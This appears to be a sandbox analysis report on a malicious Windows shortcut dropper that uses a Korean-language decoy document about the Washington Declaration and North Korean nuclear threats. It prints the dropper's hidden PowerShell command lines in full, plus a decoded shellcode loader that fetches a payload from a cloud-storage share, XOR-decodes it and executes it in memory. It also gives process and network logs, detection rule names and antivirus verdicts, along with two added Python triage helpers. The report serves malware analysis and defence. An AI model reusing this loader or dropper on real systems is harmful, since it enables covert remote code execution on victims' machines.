file c:\Users\test22\AppData\Local\Temp\hi1x_fj5.dll
file c:\Users\test22\AppData\Local\Temp\mobuv0cw.dll
file c:\Users\test22\AppData\Local\Temp\owptouvz.dll
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp.lnk
file C:\Users\test22\AppData\Local\Temp\230509.bat
file c:\Users\test22\AppData\Local\Temp\n5j0ib9u.dll
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp.lnk
file C:\Users\test22\AppData\Roaming\HNC\Office\Recent\Temp.folder.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
file C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.lnk
cmdline powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
cmdline powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
decoded $saint (the hex string in the command line above converted pairwise to characters, exactly as its own [convert]::toint16 loop does; the outer script then evaluates it with Invoke-Command and spins in while($true){} to keep the process alive): [Net.ServicePointManager]::SecurityProtocol=[Enum]::ToObject([Net.SecurityProtocolType], 3072);$aa='[DllImport("kernel32.dll")]public static extern IntPtr GlobalAlloc(uint b,uint c);';$b=Add-Type -MemberDefinition $aa -Name "AAA"  -PassThru;$abab = '[DllImport("kernel32.dll")]public static extern bool VirtualProtect(IntPtr a,uint b,uint c,out IntPtr d);';$aab=Add-Type -MemberDefinition $abab -Name "AAB" -PassThru;$c = New-Object System.Net.WebClient;$d="https://api.onedrive.com/v1.0/shares/u!aHR0cHM6Ly8xZHJ2Lm1zL2kvcyFBaFhFWExKU05NUFRmTWdoZExudm9zdUExcHc_ZT1scUowMWU/root/content";$bb='[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr a,uint b,IntPtr c,IntPtr d,uint e,IntPtr f);';$ccc=Add-Type -MemberDefinition $bb -Name "BBB" -PassThru;$ddd='[DllImport("kernel32.dll")]public static extern IntPtr WaitForSingleObject(IntPtr a,uint b);';$fff=Add-Type -MemberDefinition $ddd -Name "DDD" -PassThru;$e=112;do {  try { $c.Headers["user-agent"] = "connnecting...";$xmpw4=$c.DownloadData($d);$x0 = $b::GlobalAlloc(0x0040, $xmpw4.Length+0x100);$old = 0;$aab::VirtualProtect($x0, $xmpw4.Length+0x100, 0x40, [ref]$old);for ($h = 1;$h -lt $xmpw4.Length;$h++) {[System.Runtime.InteropServices.Marshal]::WriteByte($x0, $h-1, ($xmpw4[$h] -bxor $xmpw4[0]) );};try{throw 1;}catch{$handle=$ccc::CreateThread(0,0,$x0,0,0,0);$fff::WaitForSingleObject($handle, 500*1000);};$e=222;}catch{sleep 11;$e=112;}}while($e -eq 112);
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
cmdline c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""[hex string, identical to the one quoted in the powershell cmdline entry above, not repeated here]""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
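The command lines above are one procedure: locate the carrier .lnk by its exact size, carve the decoy .hwp and 230509.bat out of it at fixed byte offsets, and, inside the .bat's PowerShell, hex-decode $saint into a loader that downloads a blob from api.onedrive.com, XORs every byte with the blob's first byte, makes the buffer PAGE_EXECUTE_READWRITE and runs it on a new thread. What follows is an added example, not code from the sample or from this report: it reimplements those steps in Python so the artefacts can be recovered from a copy of the .lnk and the recorded command line without executing anything. The offsets and the size 0x32CA73D are the ones in the command line; the bytes produced by make_constructed_lnk() are constructed filler, not the real payloads.

```python
"""Offline triage helpers for the two-stage LNK dropper recorded above.

Added example, not code from the sample or the sandbox. Steps mirrored:
  1. select the carrier .lnk by exact size (0x32CA73D bytes),
  2. carve the HWP decoy (bytes 4008..62888) and the second-stage .bat
     (bytes 62888..66145) at the offsets hard-coded in the command line,
  3. hex-decode the $saint string that the .bat's PowerShell wraps in $pull,
  4. undo the loader's single-byte XOR (key = first byte of the download).
The sample .lnk built by make_constructed_lnk() is constructed filler.
"""
import re

CARRIER_LNK_SIZE = 0x32CA73D              # exact size the dropper filters on (53,389,117 bytes)
DECOY_START, DECOY_END = 4008, 62888      # select -Skip 004008 / -TotalCount 00062888
STAGE2_START, STAGE2_END = 62888, 66145   # select -Skip 00062888 / -TotalCount 00066145

HEX_STAGE_RE = re.compile(r'\$saint="""([0-9A-Fa-f]+)"""')


def is_carrier_lnk(size: int) -> bool:
    """The dropper's Get-ChildItem filter: only a .lnk of exactly this size is used."""
    return size == CARRIER_LNK_SIZE


def carve_payloads(lnk: bytes) -> dict:
    """Return the decoy document and the second-stage script embedded in the .lnk."""
    if len(lnk) < STAGE2_END:
        raise ValueError("file is shorter than the last embedded payload")
    return {
        "lnk_header": lnk[:DECOY_START],
        "decoy_hwp": lnk[DECOY_START:DECOY_END],     # 58,880 bytes
        "stage2_bat": lnk[STAGE2_START:STAGE2_END],  # 3,257 bytes
    }


def decode_hex_stage(cmdline: str) -> str:
    """Extract the $saint hex blob from a recorded command line and decode it.

    Equivalent to the pairwise [convert]::toint16($POLL,16) loop in the outer script.
    """
    m = HEX_STAGE_RE.search(cmdline)
    if not m:
        raise ValueError("no $saint hex string in command line")
    return bytes.fromhex(m.group(1)).decode("latin-1")


def decode_first_byte_xor(blob: bytes) -> bytes:
    """Undo the loader's in-memory decode: out[h-1] = blob[h] XOR blob[0].

    The first byte of the download is the key and is not part of the code.
    """
    if len(blob) < 2:
        raise ValueError("blob too short to hold key and payload")
    key = blob[0]
    return bytes(b ^ key for b in blob[1:])


def encode_first_byte_xor(payload: bytes, key: int) -> bytes:
    """Inverse of decode_first_byte_xor; only used to build test input."""
    return bytes([key]) + bytes(b ^ key for b in payload)


def make_constructed_lnk() -> bytes:
    """Constructed stand-in: LNK header filler, a fake decoy and a fake .bat, 66,145 bytes."""
    header = b"L" + b"\x00" * (DECOY_START - 1)
    decoy = b"CONSTRUCTED-HWP-DECOY".ljust(DECOY_END - DECOY_START, b"\x00")
    bat = b"@echo off\r\nrem constructed stage 2\r\n".ljust(STAGE2_END - STAGE2_START, b"\x1a")
    return header + decoy + bat
```

The real carrier is padded to 50.8 MB after the last payload, so carve_payloads() ignores everything past offset 66145; is_carrier_lnk() is kept separate because the size check is the dropper's selection rule, not a property an analyst should require of a copy that has been truncated or re-saved.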
file C:\Users\test22\AppData\Local\Temp\n5j0ib9u.dll
file C:\Users\test22\AppData\Local\Temp\owptouvz.dll
file C:\Users\test22\AppData\Local\Temp\mobuv0cw.dll
file C:\Users\test22\AppData\Local\Temp\hi1x_fj5.dll
Time & API Arguments Status Return Repeated

CreateProcessInternalW

thread_identifier: 2188
thread_handle: 0x00000334
process_identifier: 2200
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\SysWOW64\cmd.exe
track: 1
command_line: "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
filepath_r: C:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_SUSPENDED|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000033c
1 1 0

CreateProcessInternalW

thread_identifier: 292
thread_handle: 0x00000084
process_identifier: 2220
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0

CreateProcessInternalW

thread_identifier: 776
thread_handle: 0x00000088
process_identifier: 452
current_directory:
filepath: c:\Windows\SysWOW64\cmd.exe
track: 1
command_line: c:\\Windows\\SysWOW64\\cmd.exe /c powershell -windowstyle hidden -command "$pull ="$saint="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C2033303732293B2461613D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B24623D4164642D54797065202D4D656D626572446566696E6974696F6E20246161202D4E616D6520224141412220202D50617373546872753B2461626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B246161623D4164642D54797065202D4D656D626572446566696E6974696F6E202461626162202D4E616D65202241414222202D50617373546872753B2463203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B24643D2268747470733A2F2F6170692E6F6E6564726976652E636F6D2F76312E302F7368617265732F75216148523063484D364C7938785A484A324C6D317A4C326B7663794642614668465745784B5530354E5546526D5457646F5A457875646D397A645545786348635F5A54317363556F776557552F726F6F742F636F6E74656E74223B2462623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B246363633D4164642D54797065202D4D656D626572446566696E6974696F6E20246262202D4E616D65202242424222202D50617373546872753B246464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B246666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024646464202D4E616D65202244444422202D50617373546872753B24653D3131323B646F207B2020747279207B2024632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B24786D7077343D24632E446F776E6C6F616444617461282464293B247830203D2024623A3A476C6F62616C416C6C6F63283078303034302C2024786D7077342E4C656E6774682B3078313030293B246F6C64203D20303B246161623A3A5669727475616C50726F74656374282478302C2024786D7077342E4C656E6774682B30783130302C20307834302C205B7265665D246F6C64293B666F7220282468203D20313B2468202D6C742024786D7077342E4C656E6774683B24682B2B29207B5B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478302C2024682D312C202824786D7077345B24685D202D62786F722024786D7077345B305D2920293B7D3B7472797B7468726F7720313B7D63617463687B2468616E646C653D246363633A3A43726561746554687265616428302C302C2478302C302C302C30293B246666663A3A57616974466F7253696E676C654F626A656374282468616E646C652C203530302A31303030293B7D3B24653D3232323B7D63617463687B736C6565702031313B24653D3131323B7D7D7768696C65282465202D657120313132293B""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
filepath_r: c:\Windows\SysWOW64\cmd.exe
stack_pivoted: 0
creation_flags: 525328 (CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2116
thread_handle: 0x00000084
process_identifier: 2548
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: powershell -windowstyle hidden -command "$pull ="$saint="""[hex string, identical to the one in the cmd.exe command_line above, not repeated here]""";$moni="""""";for($i=0;$i -le $saint.Length-2;$i=$i+2){$POLL=$saint[$i]+$saint[$i+1];$moni= $moni+[char]([convert]::toint16($POLL,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($moni));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($pull));while($true){};"
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000088
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Data received / Data sent (socket 1328, api.onedrive.com): the raw TLS records are binary and are not reproduced here; what can be read out of them is summarised below.
Data received: a ServerHello whose 32-byte random ends in the "DOWNGRD" sentinel of RFC 8446 section 4.1.3, i.e. the server supports TLS 1.3 but negotiated TLS 1.2, which is what the loader forces with [Net.SecurityProtocolType] value 3072 (Tls12). It is followed by the certificate chain: leaf CN=storage.live.com, O=Microsoft Corporation, L=Redmond, ST=WA, C=US, issued by Microsoft Azure TLS Issuing CA 01, valid 230310085426Z to 240304085426Z (2023-03-10 to 2024-03-04), with a long SAN list that includes api.live.com, api.live.net, docs.live.net, skyapi.live.net, *.storage.live.com, *.storage.msn.com, *.livefilestore.com, *.docs.live.net, oauth.live.com and skyapi.onedrive.live.com; leaf OCSP at http://oneocsp.microsoft.com/ocsp, issuer certificate at http://www.microsoft.com/pkiops/certs/Microsoft%20Azure%20TLS%20Issuing%20CA%2001%20-%20xsign.crt; the intermediate chains to DigiCert Global Root G2 (OCSP http://ocsp.digicert.com, CRLs http://crl3.digicert.com/DigiCertGlobalRootG2.crl and http://crl4.digicert.com/DigiCertGlobalRootG2.crl, AIA http://cacerts.digicert.com/DigiCertGlobalRootG2.crt).
Data sent: ten ClientHello records, each carrying the SNI api.onedrive.com and a TLS 1.2 cipher-suite list that includes 0x002F and 0x0035 and ends in the TLS_EMPTY_RENEGOTIATION_INFO_SCSV (0x00FF) marker. The first is 120 bytes with an empty session ID; the following nine are 152 bytes, exactly 32 bytes longer, and carry the 32-byte session ID the server returned in its ServerHello (the same 32-byte value is visible in both). Every ClientHello is followed by one 166-byte send of client handshake data with no readable plaintext, and no further send is recorded on that connection.
Reading: ten handshakes that each stop after the client's second flight, with no application data in sight, is the pattern the decoded loader's do/while loop produces when $c.DownloadData($d) throws, sleeps 11 seconds and retries; it suggests the sandbox never obtained the second-stage blob, although whether the share was already gone or egress was filtered cannot be told from these records. The separate plaintext GET for /DigiCertGlobalRootG2.crt from cacerts.digicert.com (User-Agent Microsoft-CryptoAPI/6.1, socket 1916, listed under the send calls below) is Windows CryptoAPI following the AIA URL while building the chain, not traffic the loader generates itself, so cacerts.digicert.com is not an indicator for this sample.
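The recorded sends are TLS records, so the only plaintext an analyst can recover from them is the ClientHello's server_name, plus structural facts such as the session-ID length that account for the 120-byte versus 152-byte records above. This is an added example, not part of the report: a minimal ClientHello parser that walks record header, handshake header, version, random, session ID, cipher suites and compression to reach the extensions and returns the SNI. build_client_hello() produces constructed test input, not captured traffic, and assumes a TLS 1.2 ClientHello with a single SNI extension.

```python
"""Extract the server_name and session-ID length from a TLS ClientHello record.

Added example, not from the sample or the sandbox. The ClientHello bytes made
by build_client_hello() are constructed; no captured traffic is embedded.
"""
import struct

TLS_HANDSHAKE = 0x16
HS_CLIENT_HELLO = 0x01
EXT_SERVER_NAME = 0x0000
RENEGOTIATION_SCSV = 0x00FF


def parse_client_hello(record: bytes) -> dict:
    """Parse one TLS record holding a ClientHello; raise ValueError on malformed input."""
    if len(record) < 5 or record[0] != TLS_HANDSHAKE:
        raise ValueError("not a TLS handshake record")
    rec_len = struct.unpack(">H", record[3:5])[0]
    body = record[5:5 + rec_len]
    if len(body) != rec_len or body[0] != HS_CLIENT_HELLO:
        raise ValueError("truncated record or not a ClientHello")
    hs_len = int.from_bytes(body[1:4], "big")
    hello = body[4:4 + hs_len]
    if len(hello) != hs_len:
        raise ValueError("truncated handshake message")
    pos = 0
    client_version = struct.unpack(">H", hello[pos:pos + 2])[0]
    pos += 2
    pos += 32                                    # client random
    sid_len = hello[pos]
    pos += 1 + sid_len                           # session_id (0 on a fresh hello, 32 when resuming)
    cs_len = struct.unpack(">H", hello[pos:pos + 2])[0]
    pos += 2
    suites = [struct.unpack(">H", hello[pos + i:pos + i + 2])[0] for i in range(0, cs_len, 2)]
    pos += cs_len
    comp_len = hello[pos]
    pos += 1 + comp_len                          # compression methods
    sni = None
    if pos + 2 <= len(hello):                    # extensions are optional
        ext_len = struct.unpack(">H", hello[pos:pos + 2])[0]
        pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            etype, elen = struct.unpack(">HH", hello[pos:pos + 4])
            pos += 4
            edata = hello[pos:pos + elen]
            pos += elen
            if etype == EXT_SERVER_NAME and len(edata) >= 5:
                # server_name_list len(2) | name_type(1) | name len(2) | name
                name_len = struct.unpack(">H", edata[3:5])[0]
                sni = edata[5:5 + name_len].decode("ascii", "replace")
    return {
        "version": client_version,
        "session_id_len": sid_len,
        "cipher_suites": suites,
        "has_scsv": RENEGOTIATION_SCSV in suites,
        "sni": sni,
        "record_len": 5 + rec_len,
    }


def build_client_hello(sni: str, session_id: bytes = b"",
                       suites=(0x002F, 0x0035, 0xC02F, 0x00FF)) -> bytes:
    """Build a TLS 1.2 ClientHello record with one SNI extension (constructed test input)."""
    name = sni.encode("ascii")
    sni_ext = struct.pack(">HBH", len(name) + 3, 0, len(name)) + name
    ext = struct.pack(">HH", EXT_SERVER_NAME, len(sni_ext)) + sni_ext
    body = struct.pack(">H", 0x0303) + b"\x11" * 32          # version + fixed dummy random
    body += bytes([len(session_id)]) + session_id
    body += struct.pack(">H", 2 * len(suites)) + b"".join(struct.pack(">H", s) for s in suites)
    body += b"\x01\x00"                                        # one compression method: null
    body += struct.pack(">H", len(ext)) + ext
    hs = bytes([HS_CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([TLS_HANDSHAKE, 0x03, 0x01]) + struct.pack(">H", len(hs)) + hs
```

Run parse_client_hello() over each 120- or 152-byte send buffer from a sandbox or a pcap and the SNI, session-ID length and SCSV presence come out directly; the 166-byte records are not ClientHellos and the parser rejects them with ValueError rather than guessing.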
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Steal credential rule local_credential_Steal
description Match Windows Http API call rule Str_Win32_Http_API
description Communications over P2P network rule Network_P2P_Win
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate privileges rule Escalate_priviledges
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Take ScreenShot rule ScreenShot
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\mobuv0cw.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\owptouvz.cmdline"
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hi1x_fj5.cmdline"
cmdline powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk | where-object {$_.length -eq 0x00032CA73D} | Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile | select -Skip 004008)) -Encoding Byte; & $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile | select -Skip 00062888)) -Encoding Byte; & $exePath;
cmdline "C:\Windows\SysWOW64\cmd.exe" /k powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = 'C:\Users\test22\AppData\Local\Temp'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x00032CA73D} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00062888 -ReadCount 00062888; $pdfPath = 'C:\Users\test22\AppData\Local\Temp\워싱턴선언, 북핵 위협 대응에 얼마나 도움이 될까.hwp'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 004008)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00066145 -ReadCount 00066145; $exePath = 'C:\Users\test22\AppData\Local\Temp\230509.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00062888)) -Encoding Byte; ^& $exePath;
cmdline "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\n5j0ib9u.cmdline"
FireEye Heur.BZC.YAX.Boxter.949.9B7AE7BC
ALYac Heur.BZC.YAX.Boxter.949.9B7AE7BC
Arcabit Heur.BZC.YAX.Boxter.949.9B7AE7BC
ESET-NOD32 LNK/TrojanDropper.Agent.DD
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan.WinLNK.Powecod.c
BitDefender Heur.BZC.YAX.Boxter.949.9B7AE7BC
Emsisoft Heur.BZC.YAX.Boxter.949.9B7AE7BC (B)
F-Secure Malware.LNK/Drop.Agent.VPVF
VIPRE Heur.BZC.YAX.Boxter.949.9B7AE7BC
Sophos Troj/LnkDrop-M
SentinelOne Static AI - Suspicious LNK
